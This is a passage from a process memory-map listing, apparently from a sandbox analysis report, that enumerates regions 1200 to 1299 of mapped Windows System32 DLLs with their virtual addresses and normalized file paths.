	        filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll")

Region:
	              id = 1200
	        start_va = 0x7ffc0b4a0000
	          end_va = 0x7ffc0b4f1fff
	     entry_point = 0x7ffc0b4a0000
	     region_type = mapped_file
	            name = "proximityservice.dll"
	        filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll")

Region:
	              id = 1201
	        start_va = 0x7ffc0ba90000
	          end_va = 0x7ffc0bad3fff
	     entry_point = 0x7ffc0ba90000
	     region_type = mapped_file
	            name = "execmodelclient.dll"
	        filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll")

Region:
	              id = 1202
	        start_va = 0x7ffc0bae0000
	          end_va = 0x7ffc0baedfff
	     entry_point = 0x7ffc0bae0000
	     region_type = mapped_file
	            name = "npmproxy.dll"
	        filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")

Region:
	              id = 1203
	        start_va = 0x7ffc0bfc0000
	          end_va = 0x7ffc0bfd1fff
	     entry_point = 0x7ffc0bfc0000
	     region_type = mapped_file
	            name = "cscapi.dll"
	        filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")

Region:
	              id = 1204
	        start_va = 0x7ffc0c050000
	          end_va = 0x7ffc0c06afff
	     entry_point = 0x7ffc0c050000
	     region_type = mapped_file
	            name = "mpr.dll"
	        filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")

Region:
	              id = 1205
	        start_va = 0x7ffc0c100000
	          end_va = 0x7ffc0c110fff
	     entry_point = 0x7ffc0c100000
	     region_type = mapped_file
	            name = "credentialmigrationhandler.dll"
	        filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll")

Region:
	              id = 1206
	        start_va = 0x7ffc0c120000
	          end_va = 0x7ffc0c1b9fff
	     entry_point = 0x7ffc0c120000
	     region_type = mapped_file
	            name = "shsvcs.dll"
	        filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")

Region:
	              id = 1207
	        start_va = 0x7ffc0c1c0000
	          end_va = 0x7ffc0c25afff
	     entry_point = 0x7ffc0c1c0000
	     region_type = mapped_file
	            name = "settingsync.dll"
	        filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll")

Region:
	              id = 1208
	        start_va = 0x7ffc0c260000
	          end_va = 0x7ffc0c274fff
	     entry_point = 0x7ffc0c260000
	     region_type = mapped_file
	            name = "ssdpapi.dll"
	        filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")

Region:
	              id = 1209
	        start_va = 0x7ffc0c360000
	          end_va = 0x7ffc0c3c6fff
	     entry_point = 0x7ffc0c360000
	     region_type = mapped_file
	            name = "fwpuclnt.dll"
	        filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")

Region:
	              id = 1210
	        start_va = 0x7ffc0c430000
	          end_va = 0x7ffc0c43afff
	     entry_point = 0x7ffc0c430000
	     region_type = mapped_file
	            name = "winnsi.dll"
	        filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")

Region:
	              id = 1211
	        start_va = 0x7ffc0c4f0000
	          end_va = 0x7ffc0c509fff
	     entry_point = 0x7ffc0c4f0000
	     region_type = mapped_file
	            name = "dhcpcsvc.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")

Region:
	              id = 1212
	        start_va = 0x7ffc0c510000
	          end_va = 0x7ffc0c525fff
	     entry_point = 0x7ffc0c510000
	     region_type = mapped_file
	            name = "dhcpcsvc6.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")

Region:
	              id = 1213
	        start_va = 0x7ffc0c570000
	          end_va = 0x7ffc0c61dfff
	     entry_point = 0x7ffc0c570000
	     region_type = mapped_file
	            name = "windows.networking.connectivity.dll"
	        filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll")

Region:
	              id = 1214
	        start_va = 0x7ffc0c620000
	          end_va = 0x7ffc0c631fff
	     entry_point = 0x7ffc0c620000
	     region_type = mapped_file
	            name = "rilproxy.dll"
	        filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll")

Region:
	              id = 1215
	        start_va = 0x7ffc0c640000
	          end_va = 0x7ffc0c6f0fff
	     entry_point = 0x7ffc0c640000
	     region_type = mapped_file
	            name = "cellularapi.dll"
	        filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll")

Region:
	              id = 1216
	        start_va = 0x7ffc0c700000
	          end_va = 0x7ffc0c724fff
	     entry_point = 0x7ffc0c700000
	     region_type = mapped_file
	            name = "wificonnapi.dll"
	        filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll")

Region:
	              id = 1217
	        start_va = 0x7ffc0c730000
	          end_va = 0x7ffc0c740fff
	     entry_point = 0x7ffc0c730000
	     region_type = mapped_file
	            name = "dcpapi.dll"
	        filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll")

Region:
	              id = 1218
	        start_va = 0x7ffc0c750000
	          end_va = 0x7ffc0c769fff
	     entry_point = 0x7ffc0c750000
	     region_type = mapped_file
	            name = "locationpelegacywinlocation.dll"
	        filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll")

Region:
	              id = 1219
	        start_va = 0x7ffc0c810000
	          end_va = 0x7ffc0c8cffff
	     entry_point = 0x7ffc0c810000
	     region_type = mapped_file
	            name = "fveapi.dll"
	        filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")

Region:
	              id = 1220
	        start_va = 0x7ffc0c8d0000
	          end_va = 0x7ffc0c907fff
	     entry_point = 0x7ffc0c8d0000
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")

Region:
	              id = 1221
	        start_va = 0x7ffc0c910000
	          end_va = 0x7ffc0c964fff
	     entry_point = 0x7ffc0c910000
	     region_type = mapped_file
	            name = "policymanager.dll"
	        filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll")

Region:
	              id = 1222
	        start_va = 0x7ffc0c970000
	          end_va = 0x7ffc0c9a6fff
	     entry_point = 0x7ffc0c970000
	     region_type = mapped_file
	            name = "gnssadapter.dll"
	        filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll")

Region:
	              id = 1223
	        start_va = 0x7ffc0c9b0000
	          end_va = 0x7ffc0c9cffff
	     entry_point = 0x7ffc0c9b0000
	     region_type = mapped_file
	            name = "locationwinpalmisc.dll"
	        filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll")

Region:
	              id = 1224
	        start_va = 0x7ffc0c9e0000
	          end_va = 0x7ffc0ca20fff
	     entry_point = 0x7ffc0c9e0000
	     region_type = mapped_file
	            name = "usermgrproxy.dll"
	        filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")

Region:
	              id = 1225
	        start_va = 0x7ffc0cad0000
	          end_va = 0x7ffc0cadbfff
	     entry_point = 0x7ffc0cad0000
	     region_type = mapped_file
	            name = "locationframeworkps.dll"
	        filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")

Region:
	              id = 1226
	        start_va = 0x7ffc0cc10000
	          end_va = 0x7ffc0cc23fff
	     entry_point = 0x7ffc0cc10000
	     region_type = mapped_file
	            name = "rtutils.dll"
	        filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")

Region:
	              id = 1227
	        start_va = 0x7ffc0cf10000
	          end_va = 0x7ffc0cfa2fff
	     entry_point = 0x7ffc0cf10000
	     region_type = mapped_file
	            name = "msvcp_win.dll"
	        filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll")

Region:
	              id = 1228
	        start_va = 0x7ffc0d000000
	          end_va = 0x7ffc0d035fff
	     entry_point = 0x7ffc0d000000
	     region_type = mapped_file
	            name = "windows.networking.hostname.dll"
	        filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll")

Region:
	              id = 1229
	        start_va = 0x7ffc0d0c0000
	          end_va = 0x7ffc0d0d8fff
	     entry_point = 0x7ffc0d0c0000
	     region_type = mapped_file
	            name = "samcli.dll"
	        filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")

Region:
	              id = 1230
	        start_va = 0x7ffc0d0e0000
	          end_va = 0x7ffc0d0e7fff
	     entry_point = 0x7ffc0d0e0000
	     region_type = mapped_file
	            name = "dmiso8601utils.dll"
	        filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll")

Region:
	              id = 1231
	        start_va = 0x7ffc0d740000
	          end_va = 0x7ffc0dac1fff
	     entry_point = 0x7ffc0d740000
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")

Region:
	              id = 1232
	        start_va = 0x7ffc0eb10000
	          end_va = 0x7ffc0ebb8fff
	     entry_point = 0x7ffc0eb10000
	     region_type = mapped_file
	            name = "windows.ui.dll"
	        filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll")

Region:
	              id = 1233
	        start_va = 0x7ffc0ebc0000
	          end_va = 0x7ffc0eccdfff
	     entry_point = 0x7ffc0ebc0000
	     region_type = mapped_file
	            name = "mrmcorer.dll"
	        filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll")

Region:
	              id = 1234
	        start_va = 0x7ffc0efd0000
	          end_va = 0x7ffc0f105fff
	     entry_point = 0x7ffc0efd0000
	     region_type = mapped_file
	            name = "wintypes.dll"
	        filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")

Region:
	              id = 1235
	        start_va = 0x7ffc0f110000
	          end_va = 0x7ffc0f1f5fff
	     entry_point = 0x7ffc0f110000
	     region_type = mapped_file
	            name = "usermgr.dll"
	        filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll")

Region:
	              id = 1236
	        start_va = 0x7ffc0f200000
	          end_va = 0x7ffc0f2c7fff
	     entry_point = 0x7ffc0f200000
	     region_type = mapped_file
	            name = "winhttp.dll"
	        filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")

Region:
	              id = 1237
	        start_va = 0x7ffc0f2d0000
	          end_va = 0x7ffc0f330fff
	     entry_point = 0x7ffc0f2d0000
	     region_type = mapped_file
	            name = "wlanapi.dll"
	        filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")

Region:
	              id = 1238
	        start_va = 0x7ffc0f340000
	          end_va = 0x7ffc0f4bbfff
	     entry_point = 0x7ffc0f340000
	     region_type = mapped_file
	            name = "locationframework.dll"
	        filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll")

Region:
	              id = 1239
	        start_va = 0x7ffc0f4c0000
	          end_va = 0x7ffc0f4cafff
	     entry_point = 0x7ffc0f4c0000
	     region_type = mapped_file
	            name = "lfsvc.dll"
	        filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll")

Region:
	              id = 1240
	        start_va = 0x7ffc0f5e0000
	          end_va = 0x7ffc0f60dfff
	     entry_point = 0x7ffc0f5e0000
	     region_type = mapped_file
	            name = "netjoin.dll"
	        filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")

Region:
	              id = 1241
	        start_va = 0x7ffc0f610000
	          end_va = 0x7ffc0f61cfff
	     entry_point = 0x7ffc0f610000
	     region_type = mapped_file
	            name = "csystemeventsbrokerclient.dll"
	        filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll")

Region:
	              id = 1242
	        start_va = 0x7ffc0f620000
	          end_va = 0x7ffc0f64efff
	     entry_point = 0x7ffc0f620000
	     region_type = mapped_file
	            name = "wptaskscheduler.dll"
	        filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll")

Region:
	              id = 1243
	        start_va = 0x7ffc0f650000
	          end_va = 0x7ffc0f65ffff
	     entry_point = 0x7ffc0f650000
	     region_type = mapped_file
	            name = "usermgrcli.dll"
	        filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll")

Region:
	              id = 1244
	        start_va = 0x7ffc0f660000
	          end_va = 0x7ffc0f6a9fff
	     entry_point = 0x7ffc0f660000
	     region_type = mapped_file
	            name = "deviceaccess.dll"
	        filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll")

Region:
	              id = 1245
	        start_va = 0x7ffc0f6f0000
	          end_va = 0x7ffc0f781fff
	     entry_point = 0x7ffc0f6f0000
	     region_type = mapped_file
	            name = "msvcp110_win.dll"
	        filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")

Region:
	              id = 1246
	        start_va = 0x7ffc0f810000
	          end_va = 0x7ffc0f825fff
	     entry_point = 0x7ffc0f810000
	     region_type = mapped_file
	            name = "wkscli.dll"
	        filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")

Region:
	              id = 1247
	        start_va = 0x7ffc0fb40000
	          end_va = 0x7ffc0fbadfff
	     entry_point = 0x7ffc0fb40000
	     region_type = mapped_file
	            name = "taskcomp.dll"
	        filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")

Region:
	              id = 1248
	        start_va = 0x7ffc0fbb0000
	          end_va = 0x7ffc0fbc0fff
	     entry_point = 0x7ffc0fbb0000
	     region_type = mapped_file
	            name = "wmiclnt.dll"
	        filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")

Region:
	              id = 1249
	        start_va = 0x7ffc0fbd0000
	          end_va = 0x7ffc0fc10fff
	     entry_point = 0x7ffc0fbd0000
	     region_type = mapped_file
	            name = "ubpm.dll"
	        filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")

Region:
	              id = 1250
	        start_va = 0x7ffc0fc20000
	          end_va = 0x7ffc0fd1bfff
	     entry_point = 0x7ffc0fc20000
	     region_type = mapped_file
	            name = "schedsvc.dll"
	        filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")

Region:
	              id = 1251
	        start_va = 0x7ffc0fd20000
	          end_va = 0x7ffc0fd36fff
	     entry_point = 0x7ffc0fd20000
	     region_type = mapped_file
	            name = "sens.dll"
	        filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")

Region:
	              id = 1252
	        start_va = 0x7ffc0fd40000
	          end_va = 0x7ffc0fdfefff
	     entry_point = 0x7ffc0fd40000
	     region_type = mapped_file
	            name = "taskschd.dll"
	        filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")

Region:
	              id = 1253
	        start_va = 0x7ffc0fe00000
	          end_va = 0x7ffc0fe3dfff
	     entry_point = 0x7ffc0fe00000
	     region_type = mapped_file
	            name = "logoncli.dll"
	        filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")

Region:
	              id = 1254
	        start_va = 0x7ffc0fe40000
	          end_va = 0x7ffc0fe66fff
	     entry_point = 0x7ffc0fe40000
	     region_type = mapped_file
	            name = "profsvcext.dll"
	        filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll")

Region:
	              id = 1255
	        start_va = 0x7ffc0fe70000
	          end_va = 0x7ffc0fee9fff
	     entry_point = 0x7ffc0fe70000
	     region_type = mapped_file
	            name = "es.dll"
	        filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")

Region:
	              id = 1256
	        start_va = 0x7ffc0fef0000
	          end_va = 0x7ffc0ff44fff
	     entry_point = 0x7ffc0fef0000
	     region_type = mapped_file
	            name = "profsvc.dll"
	        filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")

Region:
	              id = 1257
	        start_va = 0x7ffc0ff50000
	          end_va = 0x7ffc0ff62fff
	     entry_point = 0x7ffc0ff50000
	     region_type = mapped_file
	            name = "themeservice.dll"
	        filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")

Region:
	              id = 1258
	        start_va = 0x7ffc0ff70000
	          end_va = 0x7ffc0ff79fff
	     entry_point = 0x7ffc0ff70000
	     region_type = mapped_file
	            name = "dsrole.dll"
	        filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")

Region:
	              id = 1259
	        start_va = 0x7ffc0ff80000
	          end_va = 0x7ffc0ff97fff
	     entry_point = 0x7ffc0ff80000
	     region_type = mapped_file
	            name = "nlaapi.dll"
	        filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")

Region:
	              id = 1260
	        start_va = 0x7ffc0ffa0000
	          end_va = 0x7ffc100ecfff
	     entry_point = 0x7ffc0ffa0000
	     region_type = mapped_file
	            name = "gpsvc.dll"
	        filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")

Region:
	              id = 1261
	        start_va = 0x7ffc101e0000
	          end_va = 0x7ffc10243fff
	     entry_point = 0x7ffc101e0000
	     region_type = mapped_file
	            name = "wevtapi.dll"
	        filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")

Region:
	              id = 1262
	        start_va = 0x7ffc10410000
	          end_va = 0x7ffc1041bfff
	     entry_point = 0x7ffc10410000
	     region_type = mapped_file
	            name = "bi.dll"
	        filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll")

Region:
	              id = 1263
	        start_va = 0x7ffc10420000
	          end_va = 0x7ffc10448fff
	     entry_point = 0x7ffc10420000
	     region_type = mapped_file
	            name = "cabinet.dll"
	        filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")

Region:
	              id = 1264
	        start_va = 0x7ffc10450000
	          end_va = 0x7ffc10485fff
	     entry_point = 0x7ffc10450000
	     region_type = mapped_file
	            name = "xmllite.dll"
	        filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")

Region:
	              id = 1265
	        start_va = 0x7ffc110f0000
	          end_va = 0x7ffc11582fff
	     entry_point = 0x7ffc110f0000
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")

Region:
	              id = 1266
	        start_va = 0x7ffc11590000
	          end_va = 0x7ffc115f6fff
	     entry_point = 0x7ffc11590000
	     region_type = mapped_file
	            name = "bcp47langs.dll"
	        filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll")

Region:
	              id = 1267
	        start_va = 0x7ffc11650000
	          end_va = 0x7ffc11657fff
	     entry_point = 0x7ffc11650000
	     region_type = mapped_file
	            name = "dabapi.dll"
	        filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll")

Region:
	              id = 1268
	        start_va = 0x7ffc11a40000
	          end_va = 0x7ffc11afdfff
	     entry_point = 0x7ffc11a40000
	     region_type = mapped_file
	            name = "coremessaging.dll"
	        filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll")

Region:
	              id = 1269
	        start_va = 0x7ffc11ef0000
	          end_va = 0x7ffc12075fff
	     entry_point = 0x7ffc11ef0000
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 1270
	        start_va = 0x7ffc12080000
	          end_va = 0x7ffc1209bfff
	     entry_point = 0x7ffc12080000
	     region_type = mapped_file
	            name = "samlib.dll"
	        filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")

Region:
	              id = 1271
	        start_va = 0x7ffc120a0000
	          end_va = 0x7ffc120d1fff
	     entry_point = 0x7ffc120a0000
	     region_type = mapped_file
	            name = "shacct.dll"
	        filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll")

Region:
	              id = 1272
	        start_va = 0x7ffc120e0000
	          end_va = 0x7ffc120f2fff
	     entry_point = 0x7ffc120e0000
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 1273
	        start_va = 0x7ffc12250000
	          end_va = 0x7ffc1228ffff
	     entry_point = 0x7ffc12250000
	     region_type = mapped_file
	            name = "brokerlib.dll"
	        filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll")

Region:
	              id = 1274
	        start_va = 0x7ffc123a0000
	          end_va = 0x7ffc12435fff
	     entry_point = 0x7ffc123a0000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 1275
	        start_va = 0x7ffc12440000
	          end_va = 0x7ffc12466fff
	     entry_point = 0x7ffc12440000
	     region_type = mapped_file
	            name = "devobj.dll"
	        filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")

Region:
	              id = 1276
	        start_va = 0x7ffc12490000
	          end_va = 0x7ffc12539fff
	     entry_point = 0x7ffc12490000
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")

Region:
	              id = 1277
	        start_va = 0x7ffc12540000
	          end_va = 0x7ffc1263ffff
	     entry_point = 0x7ffc12540000
	     region_type = mapped_file
	            name = "twinapi.appcore.dll"
	        filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll")

Region:
	              id = 1278
	        start_va = 0x7ffc126d0000
	          end_va = 0x7ffc126dbfff
	     entry_point = 0x7ffc126d0000
	     region_type = mapped_file
	            name = "sysntfy.dll"
	        filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")

Region:
	              id = 1279
	        start_va = 0x7ffc127a0000
	          end_va = 0x7ffc127d1fff
	     entry_point = 0x7ffc127a0000
	     region_type = mapped_file
	            name = "fwbase.dll"
	        filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")

Region:
	              id = 1280
	        start_va = 0x7ffc12a10000
	          end_va = 0x7ffc12a1bfff
	     entry_point = 0x7ffc12a10000
	     region_type = mapped_file
	            name = "hid.dll"
	        filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll")

Region:
	              id = 1281
	        start_va = 0x7ffc12a20000
	          end_va = 0x7ffc12a43fff
	     entry_point = 0x7ffc12a20000
	     region_type = mapped_file
	            name = "gpapi.dll"
	        filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")

Region:
	              id = 1282
	        start_va = 0x7ffc12bc0000
	          end_va = 0x7ffc12cb3fff
	     entry_point = 0x7ffc12bc0000
	     region_type = mapped_file
	            name = "ucrtbase.dll"
	        filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")

Region:
	              id = 1283
	        start_va = 0x7ffc12d10000
	          end_va = 0x7ffc12d58fff
	     entry_point = 0x7ffc12d10000
	     region_type = mapped_file
	            name = "authz.dll"
	        filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")

Region:
	              id = 1284
	        start_va = 0x7ffc12e30000
	          end_va = 0x7ffc12e3bfff
	     entry_point = 0x7ffc12e30000
	     region_type = mapped_file
	            name = "netutils.dll"
	        filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")

Region:
	              id = 1285
	        start_va = 0x7ffc12e70000
	          end_va = 0x7ffc12e7cfff
	     entry_point = 0x7ffc12e70000
	     region_type = mapped_file
	            name = "tbs.dll"
	        filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll")

Region:
	              id = 1286
	        start_va = 0x7ffc12f10000
	          end_va = 0x7ffc12f40fff
	     entry_point = 0x7ffc12f10000
	     region_type = mapped_file
	            name = "ntmarta.dll"
	        filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")

Region:
	              id = 1287
	        start_va = 0x7ffc12f70000
	          end_va = 0x7ffc12fe9fff
	     entry_point = 0x7ffc12f70000
	     region_type = mapped_file
	            name = "schannel.dll"
	        filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")

Region:
	              id = 1288
	        start_va = 0x7ffc13030000
	          end_va = 0x7ffc13063fff
	     entry_point = 0x7ffc13030000
	     region_type = mapped_file
	            name = "rsaenh.dll"
	        filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")

Region:
	              id = 1289
	        start_va = 0x7ffc13070000
	          end_va = 0x7ffc13079fff
	     entry_point = 0x7ffc13070000
	     region_type = mapped_file
	            name = "dpapi.dll"
	        filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll")

Region:
	              id = 1290
	        start_va = 0x7ffc13180000
	          end_va = 0x7ffc1319efff
	     entry_point = 0x7ffc13180000
	     region_type = mapped_file
	            name = "userenv.dll"
	        filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")

Region:
	              id = 1291
	        start_va = 0x7ffc132f0000
	          end_va = 0x7ffc1334bfff
	     entry_point = 0x7ffc132f0000
	     region_type = mapped_file
	            name = "mswsock.dll"
	        filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")

Region:
	              id = 1292
	        start_va = 0x7ffc133a0000
	          end_va = 0x7ffc133b6fff
	     entry_point = 0x7ffc133a0000
	     region_type = mapped_file
	            name = "cryptsp.dll"
	        filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")

Region:
	              id = 1293
	        start_va = 0x7ffc134c0000
	          end_va = 0x7ffc134cafff
	     entry_point = 0x7ffc134c0000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")

Region:
	              id = 1294
	        start_va = 0x7ffc13500000
	          end_va = 0x7ffc13520fff
	     entry_point = 0x7ffc13500000
	     region_type = mapped_file
	            name = "joinutil.dll"
	        filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll")

Region:
	              id = 1295
	        start_va = 0x7ffc13550000
	          end_va = 0x7ffc13589fff
	     entry_point = 0x7ffc13550000
	     region_type = mapped_file
	            name = "ntasn1.dll"
	        filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")

Region:
	              id = 1296
	        start_va = 0x7ffc13590000
	          end_va = 0x7ffc135b6fff
	     entry_point = 0x7ffc13590000
	     region_type = mapped_file
	            name = "ncrypt.dll"
	        filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")

Region:
	              id = 1297
	        start_va = 0x7ffc136a0000
	          end_va = 0x7ffc136ccfff
	     entry_point = 0x7ffc136a0000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")

Region:
	              id = 1298
	        start_va = 0x7ffc13830000
	          end_va = 0x7ffc13885fff
	     entry_point = 0x7ffc13830000
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 1299
	        start_va = 0x7ffc13890000
